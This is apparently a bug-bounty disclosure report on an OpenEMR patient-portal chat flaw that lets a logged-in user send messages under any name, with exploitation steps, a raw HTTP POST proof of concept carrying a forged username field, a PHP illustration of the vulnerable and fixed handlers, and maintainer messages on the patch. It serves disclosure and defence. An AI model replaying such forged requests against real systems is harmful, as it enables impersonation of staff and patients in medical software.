Send message in chat function with any username in openemr/openemr

Valid

Reported on

Jul 20th 2022


Description

In the chat function, the username is not validated. We can change the username to any value we want, which does not match the logged-in user.

Exploitation steps:

1. Login with the Phil1 account (Patient account).
2. Send a message via the Burp Suite proxy.
3. Modify the username to any value you want (I used "n00b").
4. As a result, the message is sent from "n00b", not from "Phil Belford".

Proof of Concept

POST /openemr/portal/messaging/secure_chat.php?action=save HTTP/1.1
Host: demo.openemr.io
Cookie: username=Phil%20Belford; PortalOpenEMR=wte53yTGjI7VYMcBHd%2C%2CO%2C-qdK6nklsE7Qo2F87g949Hz988
Referer: https://demo.openemr.io/openemr/portal/messaging/secure_chat.php
...

username=n00b&message=message+from+n00b&sender_id=1&recip_id=%5B%22admin%22%5D

POC image: (screenshot not reproduced in this text)

Impact

Attackers can impersonate any user they want, even admin, to chat with others.
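The root cause described in this report, as an added illustrative example in PHP (not OpenEMR's own code; the handler shape and the session keys `portal_username` and `pid` are assumptions): the sender identity must be taken from the authenticated server-side session, never from the request body.

```php
<?php
// Illustrative example, not OpenEMR code. Models the chat "save" action from
// the report: trusting the client-sent `username` field (vulnerable) versus
// deriving the sender from the session (hardened). Session keys are assumed.

declare(strict_types=1);

// Vulnerable: whatever the client puts in `username` becomes the message sender.
function save_chat_message_vulnerable(array $post): array
{
    return [
        'sender'    => $post['username'] ?? '',          // attacker-controlled
        'sender_id' => (int) ($post['sender_id'] ?? 0),  // also attacker-controlled
        'message'   => $post['message'] ?? '',
    ];
}

// Hardened: identity comes only from the server-side session; the client's
// `username` and `sender_id` fields are ignored, and a disagreeing sender_id
// is logged as a tamper signal rather than honoured.
function save_chat_message_hardened(array $post, array $session): array
{
    if (empty($session['portal_username']) || empty($session['pid'])) {
        throw new RuntimeException('not authenticated');
    }
    if (isset($post['sender_id']) && (int) $post['sender_id'] !== (int) $session['pid']) {
        error_log('chat: sender_id mismatch for pid ' . (int) $session['pid']);
    }
    return [
        'sender'    => $session['portal_username'],
        'sender_id' => (int) $session['pid'],
        'message'   => trim((string) ($post['message'] ?? '')),
    ];
}

// Constructed request body modelled on the report's PoC, plus the assumed
// session of the actually logged-in patient.
$post = ['username' => 'n00b', 'message' => 'message from n00b',
         'sender_id' => '1', 'recip_id' => '["admin"]'];
$session = ['portal_username' => 'Phil Belford', 'pid' => 1];

foreach (['vulnerable' => save_chat_message_vulnerable($post),
          'hardened'   => save_chat_message_hardened($post, $session)] as $label => $row) {
    echo $label, ': sender=', $row['sender'], ' sender_id=', $row['sender_id'], PHP_EOL;
}
```

Run with `php example.php`; the vulnerable path stores "n00b" as the sender while the hardened path stores the session user regardless of what the request claims.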

We are processing your report and will contact the openemr team within 24 hours. (2 months ago)
Lê Thị Mỹ Duyên modified the report. (2 months ago)
We have contacted a member of the openemr team and are waiting to hear back. (2 months ago)
We have sent a follow up to the openemr team. We will try again in 7 days. (2 months ago)
Brady Miller validated this vulnerability. (2 months ago)

Thanks for the reports. We are working on a fix.

Lê Thị Mỹ Duyên has been awarded the disclosure bounty
The fix bounty is now up for grabs
Brady Miller (Maintainer), 2 months ago:
A preliminary fix has been posted in commit 41b4888a36d68a666995562ff3edb3e55f64b9cd

Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 3-7 weeks. After I do that, it will be OK to make a CVE # and make it public.

Thanks!

We have sent a fix follow up to the openemr team. We will try again in 7 days. (2 months ago)
We have sent a second fix follow up to the openemr team. We will try again in 10 days. (2 months ago)
Brady Miller confirmed that a fix has been merged on 41b488. (a month ago)
The fix bounty has been dropped.
Brady Miller (Maintainer), a month ago:

OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.
